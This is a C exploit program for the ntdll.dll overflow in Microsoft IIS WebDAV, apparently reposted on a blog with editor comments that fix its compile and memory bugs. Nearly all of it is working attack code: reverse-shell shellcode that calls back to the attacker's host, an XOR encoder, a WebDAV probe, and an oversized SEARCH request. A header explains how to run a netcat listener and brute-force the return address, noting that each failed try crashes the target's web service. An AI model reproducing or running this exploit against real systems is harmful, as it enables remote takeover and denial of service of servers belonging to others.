Microsoft Windows ntdll.dll exploit through WebDAV

原创 2004年09月30日 19:37:00
/*******************************************************************/
/* [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt]         */
/* --------------------------------------------------------------- */
/* Exploit for the ntdll.dll overflow reachable through IIS WebDAV. */
/* Start a listener first, e.g.:   nc -L -vv -p 666                 */
/* then run:                       wb server.com your_ip 666 0      */
/* The shellcode is a reverse remote shell that connects back to    */
/* your_ip:your_port.                                               */
/* The return address has to be guessed by padding: run with        */
/* pad = 0; after a failed attempt the target's web service is down */
/* for a couple of seconds, then retry with pad = 1, then 2, 3, ... */
/* If there is still no shell after pad ~10, start again from 0.    */
/* On the author's local IIS the pad was 1 (0x00110011); on the     */
/* other servers tried it was 2, 3, 4, etc. Sometimes it works on   */
/* the first try, sometimes it takes more than ten attempts.        */
/* Note that every wrong guess crashes the target's web service, so */
/* this is a noisy, disruptive brute force, not a quiet check.      */
/* The shellcode is the author's own: SEH plus a memory scan        */
/* (ScanMem) to find the needed offsets (GetProcAddress).           */
/*                                                                  */
/*******************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

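/*
 * Payload placed inside the oversized SEARCH URI.  The listing on this
 * page had every backslash turned into a forward slash ("/x55"), which
 * makes the array a string of literal text, far too long, and breaks
 * every fixed offset main() relies on; the "\xNN" escapes are restored.
 *
 * Layout, as used by main():
 *   bytes 0x00..0x33   decoder stub, sent unencoded (no 0x00 byte in it)
 *   bytes 0x34..       XOR-encoded with 0x95 by main() (0x1b0 bytes) so
 *                      the NULs and other bad bytes below never hit the wire
 *   bytes 446..447     listener port, network byte order, patched by main()
 *   bytes 448..451     listener IPv4 address, patched by main()
 *   tail               kernel32.dll offsets for several Windows versions
 *                      (per the original comments), then 0xffffffff,
 *                      presumably a list terminator
 * What the decoded code does beyond the header's description (SEH-based
 * memory scan, GetProcAddress lookup, reverse cmd shell) is not
 * re-verified here.
 */
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
/* NUL-separated API names resolved at run time */
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
/* "connect", then a sockaddr_in template: AF_INET, port 666, 192.168.1.1;
 * main() overwrites the port (446..447) and address (448..451) */
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" /* don't change anything.. */
"\x00\x00\xe7\x77" /* offsets of kernel32.dll for some win ver.. */
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" /* win2k3 */
"\x00\x00\xf7\xbf" /* win9x =P */
"\xff\xff\xff\xff";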

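/*
 * Probe `host` for an IIS WebDAV listener on TCP/80.
 *
 * Sends a bare "SEARCH / HTTP/1.1" with no body and treats an HTTP 411
 * reply (status digits at offsets 9..11 of the response) as "WebDAV
 * present".  This is a fingerprint only: it says nothing about whether
 * the target is patched.
 *
 * host: target name or dotted address, at most 60 characters, because it
 *       is formatted into a 100-byte request buffer (25 + 60 + 4 + NUL).
 * Returns 0 when the status is 411, 1 on any error or any other reply,
 * printing a short diagnostic to stdout in the failure cases.
 *
 * Fixes vs. the original: the socket is closed on every path, the send
 * and recv results are checked, and the mangled "/r/n" CRLF escapes in
 * the request and messages are restored.
 */
int test_host(char *host)
{
	char search[100] = {0};
	char buf[100] = {0};
	struct hostent *heh;
	struct sockaddr_in hmm;
	int sock;
	int got;

	if (strlen(host) > 60) {
		printf("error: victim host too long.\r\n");
		return 1;
	}

	if ((heh = gethostbyname(host)) == 0) {
		printf("error: can't resolve '%s'", host);
		return 1;
	}

	/* Bounded by the length check above: 25 + 60 + 4 + 1 = 90 < 100. */
	sprintf(search, "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n", host);

	memset(&hmm, 0, sizeof hmm);
	hmm.sin_family = AF_INET;
	hmm.sin_port = htons(80);
	hmm.sin_addr = *((struct in_addr *)heh->h_addr);

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("error: can't create socket");
		return 1;
	}

	printf("Checking WebDav on '%s' ... ", host);

	if (connect(sock, (struct sockaddr *)&hmm, sizeof hmm) == -1) {
		printf("CONNECTING_ERROR\r\n");
		closesocket(sock);
		return 1;
	}

	/* The last byte of buf stays zero.  A failed send, or a reply shorter
	 * than "HTTP/1.1 411", cannot match and is reported as NOT FOUND. */
	got = -1;
	if (send(sock, search, (int)strlen(search), 0) != -1)
		got = recv(sock, buf, (int)(sizeof buf - 1), 0);
	closesocket(sock);

	if (got >= 12 && buf[9] == '4' && buf[10] == '1' && buf[11] == '1')
		return 0;

	printf("NOT FOUND\r\n");
	return 1;
}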

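/*
 * Print the command-line synopsis to stdout.
 * program: argv[0], echoed into the usage line.
 * Fix: the listing's mangled "/r/n" is restored to a real CRLF.
 */
void help(char *program)
{
	printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n", program);
}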

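/*
 * Print the tool banner (title line, then the author's site/IRC line).
 * Fixes: the first string literal was split across two source lines in
 * the listing (which does not compile) and the "/r/n" "/t" escapes were
 * mangled; both are restored.  The banner text itself is left unchanged.
 */
void banner(void)
{
	printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]\r\n");
	printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
}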

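/*
 * Program entry point.
 *
 * Usage: <victim_host> <your_host> <your_port> [padding]
 *   victim_host  target running IIS with WebDAV (probed by test_host())
 *   your_host    dotted IPv4 address the shell connects back to
 *   your_port    TCP port of the waiting listener
 *   padding      added to the 0x10 base of the guessed return address,
 *                printed as 0x00PP00PP; the header comment describes
 *                bumping it by one per attempt
 *
 * Flow: probe the target, patch the callback address/port into the
 * payload, XOR-encode the payload body, build one SEARCH request whose
 * URI is a 64 KiB blob (NOP sled, PAD bytes in the first 2500 positions,
 * payload at byte 64000) and send it followed by a small XML body.
 *
 * Returns 0 once the request has been sent, 1 on usage/setup errors.
 *
 * Fixes vs. the original: `int main`; no write one past the end of
 * `buffer`; no sprintf() with the destination as its own source; recv()
 * can no longer leave `data` unterminated before "%s"; sockets/winsock
 * are released on every path; the address and port arguments are
 * validated; the MSVC-only inline asm is an equivalent C loop; and the
 * mangled "/r/n" and "/\"" escapes in the request strings are restored.
 */
int main(int argc, char *argv[])
{
	enum { BUF_LEN = 65536, SC_OFFSET = 64000, PAD_LEN = 2500 };
	enum { XOR_START = 0x34, XOR_LEN = 0x1b0, XOR_KEY = 0x95 };
	WSADATA wsaData;
	struct hostent *he;
	struct sockaddr_in crpt;
	int s;
	int PAD = 0x10;
	unsigned int ip;
	unsigned short port;
	long portval;
	size_t i, n, len;
	char data[50];
	char buffer[BUF_LEN + 1];   /* +1: room for the NUL that "%s" needs */
	char request[80000];        /* 8 + BUF_LEN + headers (< 200 bytes) fits */
	const char content[] =
		"<?xml version=\"1.0\"?>\r\n"
		"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
		"<g:sql>\r\n"
		"Select \"DAV:displayname\" from scope()\r\n"
		"</g:sql>\r\n"
		"</g:searchrequest>\r\n";

	banner();
	if (argc < 4 || argc > 5) {
		help(argv[0]);
		return 1;
	}

	if (WSAStartup(0x0101, &wsaData) != 0) {
		printf("error starting winsock..");
		return 1;
	}

	/* test_host() prints its own diagnostics and also enforces that
	 * argv[1] is at most 60 bytes, which the request buffer below relies on. */
	if (test_host(argv[1])) {
		WSACleanup();
		return 1;
	}

	if (argc == 5)
		PAD += atoi(argv[4]);
	/* PAD is stored as a byte below; values outside 0..255 are truncated
	 * there and print with more than two hex digits here, as in the original. */
	printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n", PAD, PAD);

	/* Callback address -> payload bytes 448..451, in the byte order
	 * inet_addr() returns (network order).  0xffffffff is INADDR_NONE. */
	ip = inet_addr(argv[2]);
	if (ip == 0xffffffffu) {
		printf("error: '%s' is not a valid IPv4 address\r\n", argv[2]);
		WSACleanup();
		return 1;
	}
	memcpy(&shellc0de[448], &ip, 4);

	/* Callback port -> payload bytes 446..447, network order. */
	portval = strtol(argv[3], NULL, 10);
	if (portval < 1 || portval > 65535) {
		printf("error: '%s' is not a valid TCP port\r\n", argv[3]);
		WSACleanup();
		return 1;
	}
	port = htons((unsigned short)portval);
	memcpy(&shellc0de[446], &port, 2);

	/* XOR-encode the payload body with 0x95 (bad-byte avoidance); the
	 * decoder stub in the first 0x34 bytes goes out as-is.  Same range the
	 * original MSVC inline asm covered (lea+0x34, cx=0x1b0).
	 * Caveat: a callback address or port that contains the byte 0x95
	 * decodes to 0x00 here and truncates the request at the "%s" below;
	 * pick a different listener port/interface in that case. */
	for (i = 0; i < XOR_LEN; i++)
		shellc0de[XOR_START + i] ^= XOR_KEY;

	if ((he = gethostbyname(argv[1])) == 0) {
		printf("error: can't resolve '%s'", argv[1]);
		WSACleanup();
		return 1;
	}

	memset(&crpt, 0, sizeof crpt);
	crpt.sin_family = AF_INET;
	crpt.sin_port = htons(80);
	crpt.sin_addr = *((struct in_addr *)he->h_addr);

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("error: can't create socket");
		WSACleanup();
		return 1;
	}

	printf("Connecting... ");
	if (connect(s, (struct sockaddr *)&crpt, sizeof crpt) == -1) {
		printf("ERROR\r\n");
		closesocket(s);
		WSACleanup();
		return 1;
	}

	/* URI blob: NOP sled, payload at SC_OFFSET, PAD in the first PAD_LEN
	 * bytes (the author notes that bytes 2085/2086 alone would carry the
	 * return address).  The payload's first 0x34 bytes contain no 0x00 and
	 * the rest has just been XOR-encoded, so "%s" copies the whole blob. */
	memset(buffer, 0x90, BUF_LEN);
	n = sizeof(shellc0de) - 1;
	if (n > (size_t)(BUF_LEN - SC_OFFSET))
		n = (size_t)(BUF_LEN - SC_OFFSET);
	memcpy(buffer + SC_OFFSET, shellc0de, n);
	memset(buffer, PAD, PAD_LEN);
	buffer[BUF_LEN] = '\0';   /* inside the array; the original wrote buffer[65536] of a 65536-byte array */

	/* Two sprintf calls as in the original, but the second appends at
	 * request+len instead of passing request as its own source argument
	 * (overlapping source/destination is undefined behaviour).  Size:
	 * 8 + 65536 + 17 + 60 + 42 + digits + 4 < 80000. */
	memset(request, 0, sizeof request);
	len = (size_t)sprintf(request,
		"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",
		buffer, argv[1]);
	sprintf(request + len, "%u\r\n\r\n", (unsigned)strlen(content));

	printf("CONNECTED\r\nSending evil request... ");
	if (send(s, request, (int)strlen(request), 0) == -1 ||
	    send(s, content, (int)strlen(content), 0) == -1) {
		printf("SEND ERROR\r\n");
		closesocket(s);
		WSACleanup();
		return 1;
	}
	printf("SENT\r\n");

	/* Read at most sizeof(data)-1 bytes so "%s" below stays terminated.
	 * No reply (recv fails or returns nothing, data[0] stays 0) is the
	 * case the original reports as "maybe it worked"; any bytes back are
	 * taken as a sign the server handled the request, i.e. is patched. */
	memset(data, 0, sizeof data);
	recv(s, data, (int)(sizeof data - 1), 0);
	if (data[0] != 0x00) {
		printf("Server seems to be patched.\r\n");
		printf("data: %s\r\n", data);
	} else {
		printf("Now if you are lucky you will get a shell.\r\n");
	}
	closesocket(s);
	WSACleanup();
	return 0;
}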
